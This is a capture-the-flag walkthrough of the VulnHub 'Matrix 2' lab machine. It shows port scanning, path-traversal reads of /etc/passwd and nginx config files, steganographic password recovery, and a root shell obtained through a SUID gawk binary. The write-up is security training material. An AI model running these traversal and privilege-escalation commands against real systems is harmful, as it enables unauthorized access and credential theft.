you can download it here: https://www.vulnhub.com/entry/matrix-2,279/

use nmap to do a thorough port scanning.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
root@kali:~# nmap -p 1-65535 -T4 -v -A 192.168.227.163
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 13:57 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Initiating ARP Ping Scan at 13:57
Scanning 192.168.227.163 [1 port]
Completed ARP Ping Scan at 13:57, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:57
Completed Parallel DNS resolution of 1 host. at 13:57, 0.01s elapsed
Initiating SYN Stealth Scan at 13:57
Scanning 192.168.227.163 [65535 ports]
Discovered open port 80/tcp on 192.168.227.163
Discovered open port 1337/tcp on 192.168.227.163
Discovered open port 12321/tcp on 192.168.227.163
Discovered open port 12320/tcp on 192.168.227.163
Discovered open port 12322/tcp on 192.168.227.163
Completed SYN Stealth Scan at 13:57, 5.76s elapsed (65535 total ports)
Initiating Service scan at 13:57
Scanning 5 services on 192.168.227.163
Completed Service scan at 13:58, 17.26s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.163
Retrying OS detection (try #2) against 192.168.227.163
Retrying OS detection (try #3) against 192.168.227.163
Retrying OS detection (try #4) against 192.168.227.163
Retrying OS detection (try #5) against 192.168.227.163
NSE: Script scanning 192.168.227.163.
Initiating NSE at 13:58
Completed NSE at 13:58, 7.28s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.03s elapsed
Nmap scan report for 192.168.227.163
Host is up (0.00074s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3
|_http-title: Welcome in Matrix v2 Neo
1337/tcp open ssl/http nginx
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Welcome to Matrix 2
|_http-server-header: nginx
|_http-title: 401 Authorization Required
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Issuer: commonName=nginx-php-fastcgi
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-07T14:14:44
| Not valid after: 2028-12-07T14:14:44
| MD5: 2b68 58e4 d8c3 ab44 a964 46f8 e91e 8a21
|_SHA-1: 8a3a 7fd9 b876 e704 ab06 fbd5 6693 c2a1 4bca aa90
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
12320/tcp open ssl/http ShellInABox
|_http-favicon: Unknown favicon MD5: 2AB43FA7D288987C3DBE15F0C53EE407
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Shell In A Box
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Issuer: commonName=nginx-php-fastcgi
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-07T14:14:44
| Not valid after: 2028-12-07T14:14:44
| MD5: 2b68 58e4 d8c3 ab44 a964 46f8 e91e 8a21
|_SHA-1: 8a3a 7fd9 b876 e704 ab06 fbd5 6693 c2a1 4bca aa90
|_ssl-date: TLS randomness does not represent time
12321/tcp open ssl/warehouse-sss?
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Issuer: commonName=nginx-php-fastcgi
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-07T14:14:44
| Not valid after: 2028-12-07T14:14:44
| MD5: 2b68 58e4 d8c3 ab44 a964 46f8 e91e 8a21
|_SHA-1: 8a3a 7fd9 b876 e704 ab06 fbd5 6693 c2a1 4bca aa90
|_ssl-date: TLS randomness does not represent time
12322/tcp open ssl/http nginx
|_http-favicon: Unknown favicon MD5: AEE5D32B16C89DE02AF2F67F77D8C748
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_file_view.php
|_http-server-header: nginx
|_http-title: Welcome in Matrix v2 Neo
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Issuer: commonName=nginx-php-fastcgi
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-07T14:14:44
| Not valid after: 2028-12-07T14:14:44
| MD5: 2b68 58e4 d8c3 ab44 a964 46f8 e91e 8a21
|_SHA-1: 8a3a 7fd9 b876 e704 ab06 fbd5 6693 c2a1 4bca aa90
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
MAC Address: 00:0C:29:D1:C4:15 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=6/9%OT=80%CT=1%CU=33153%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=5CFD48C3%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%T
OS:S=U)OPS(O1=M5B4NNSNW7%O2=M5B4NNSNW7%O3=M5B4NW7%O4=M5B4NNSNW7%O5=M5B4NNSN
OS:W7%O6=M5B4NNS)WIN(W1=7210%W2=7210%W3=7210%W4=7210%W5=7210%W6=7210)ECN(R=
OS:Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R
OS:D=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%
OS:O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=4
OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.227.163

NSE: Script Post-scanning.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.78 seconds
Raw packets sent: 65646 (2.892MB) | Rcvd: 65606 (2.627MB)

check the http service(port 80, 1337, 12320, 12322)

https://192.168.227.163:1337/ requires http auth

1

https://192.168.227.163:12320/ seems to be a browser based ssh server

2

left me with https://192.168.227.163:12322/ and http://192.168.227.163

found this: https://192.168.227.163:12322/robots.txt

3

seems to be an arbitrary file read, and the parameter is “file”

tried with get method but still get the same response.

tried with post method and the response was gone. fuzz fuzz fuzz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
root@kali:~# curl -d "file=/etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../../../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../../../../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../../../../../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
systemd-timesync:x:101:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:102:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:103:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:104:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
mysql:x:105:107:MySQL Server,,,:/nonexistent:/bin/false
uuidd:x:106:108::/run/uuidd:/bin/false
shellinabox:x:107:109:Shell In A Box,,,:/var/lib/shellinabox:/bin/false
ntp:x:108:111::/home/ntp:/bin/false
stunnel4:x:109:113::/var/run/stunnel4:/bin/false
postfix:x:110:114::/var/spool/postfix:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
n30:x:1000:1000:Neo,,,:/home/n30:/bin/bash
testuser:x:1001:1001::/home/testuser:

ok, now I can read arbitrary file. walked around and get nothing special, decided to take a look at the nginx configuaration file

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
root@kali:~# curl -d "file=../../../../../etc/nginx/nginx.conf" -k https://192.168.227.163:12322/file_view.php
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
worker_connections 768;
# multi_accept on;
}

http {

##
# Basic Settings
##

sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
# server_tokens off;

# server_names_hash_bucket_size 64;
# server_name_in_redirect off;

include /etc/nginx/mime.types;
default_type application/octet-stream;

##
# SSL Settings
##

ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;

##
# Logging Settings
##

access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;

##
# Gzip Settings
##

gzip on;
gzip_disable "msie6";

# gzip_vary on;
# gzip_proxied any;
# gzip_comp_level 6;
# gzip_buffers 16 8k;
# gzip_http_version 1.1;
# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

##
# Virtual Host Configs
##

include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}


#mail {
# # See sample authentication script at:
# # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
#
# # auth_http localhost/auth.php;
# # pop3_capabilities "TOP" "USER";
# # imap_capabilities "IMAP4rev1" "UIDPLUS";
#
# server {
# listen localhost:110;
# protocol pop3;
# proxy on;
# }
#
# server {
# listen localhost:143;
# protocol imap;
# proxy on;
# }
#}

noticed “include /etc/nginx/sites-enabled/*;”, take a look at its default configuration.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@kali:~# curl -d "file=../../../../../etc/nginx/sites-enabled/default" -k https://192.168.227.163:12322/file_view.php
server {
listen 0.0.0.0:80;
root /var/www/4cc3ss/;
index index.html index.php;

include /etc/nginx/include/php;
}

server {
listen 1337 ssl;
root /var/www/;
index index.html index.php;

auth_basic "Welcome to Matrix 2";
auth_basic_user_file /var/www/p4ss/.htpasswd;

fastcgi_param HTTPS on;
include /etc/nginx/include/ssl;
include /etc/nginx/include/php;
}

I can read the http auth file at /var/www/p4ss/.htpasswd and try to decrypt it, but that would take a lot of time, so I just take a look at the 1337’s main page.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@kali:~# curl -d "file=../../../../..//var/www/index.php" -k https://192.168.227.163:12322/file_view.php
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="UTF-8">
<title>Welcome in Matrix v2 Neo</title>

<link rel="stylesheet" href="4cc3ss/css/style.css">
</head>
<body>
<div class="stars"> <cente><h1> Welcome In Matrix v2, Mr. NEO </h1> </center> </div>
<div class="twinkling"> <center><br><br><br>
<br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<h4 style="color: green; font-size: 18px;">

I'm trying to free your mind,<span style="color:red">n30</span>.<br/>
But I can only show you the door.<br/>
You're the one that has to walk through it.

</h4>
<!--img src="h1dd3n.jpg"-->
<br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div class="container"> <div class="text"></div> </div>
<br><br><br> <font face="Sarpanch" color="white"
|size"10" class="message">&nbsp; This is your last chance. After this, there is no turning back. You take the <font color="blue"> blue pill</font> - the story ends, you wake up in your bed and believe whatever you want to believe.<br/> You take the <font color="red">red pill</font> - you stay in Wonderland and I show you how deep the rabbit-hole goes.<br><br>
<font face="Play"> <p class="we-are"><b>And I <font color="cyan">Said
<font color="white">:</b></p> </font> <font face="Play" class="cn"> -= There is a difference between knowing the path and walking the path. =-</center> </div>
<div class="clouds">
</div>
<script src="4cc3ss/js/index.js"> </script> </body>
</html>

there is an interesting link here: img src=”h1dd3n.jpg”

download it.

1
curl -d "file=../../../../../var/www/h1dd3n.jpg" -k https://192.168.227.163:12322/file_view.php --output test.jpg

4

checked with binwalk and exiftool but get nothing.

tried steghide to extract information. successfully extracted n30.txt with the password “n30” from /etc/passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# steghide --extract -sf test.jpg
Enter passphrase:
wrote extracted data to "n30.txt".
root@kali:~# ls
2107 Documents hash-identifier passwords.txt Sublist3r
antsword Downloads HashPump patator Templates
asdf.py droopescan header.txt Pictures test.jpg
burp.der drupwn Music Public test.php
crackaes.py encryptsvc n30.txt put.php users.txt
crackstreamcipher.py fasttrack.txt node-v10.15.3-linux-x64 rockyou.txt Videos
ctf101-systems-security-2017 hashes.txt padBuster.pl rootCA.crt webshell
Desktop hash_extender pass.txt shell.war
root@kali:~# cat n30.txt
P4$$w0rd

I guess “P4$$w0rd” would be the password for n30

login to https://192.168.227.163:12320/

check suid file:

find / -user root -perm -4000 -print 2>/dev/null

5

ok. it is another suid file. check what morpheus is

6

ok. it is just gawk. easy

1
morpheus 'BEGIN {system("/bin/sh")}'

PS: 我发现在利用suid可执行文件中执行外部命令的时候,invoke一个root权限的shell只能用/bin/sh而不能用/bin/bash,除非事先设置了setuid(0),查了一下资料,发现是因为/bin/bash会去检查执行者的real uid,并且会将effective uid设置回real uid,导致提权失败,但是/bin/sh就没有这样的检查, 具体可以看这个: https://stackoverflow.com/questions/556194/calling-a-script-from-a-setuid-root-c-program-script-does-not-run-as-root

anyway, get a root shell:

7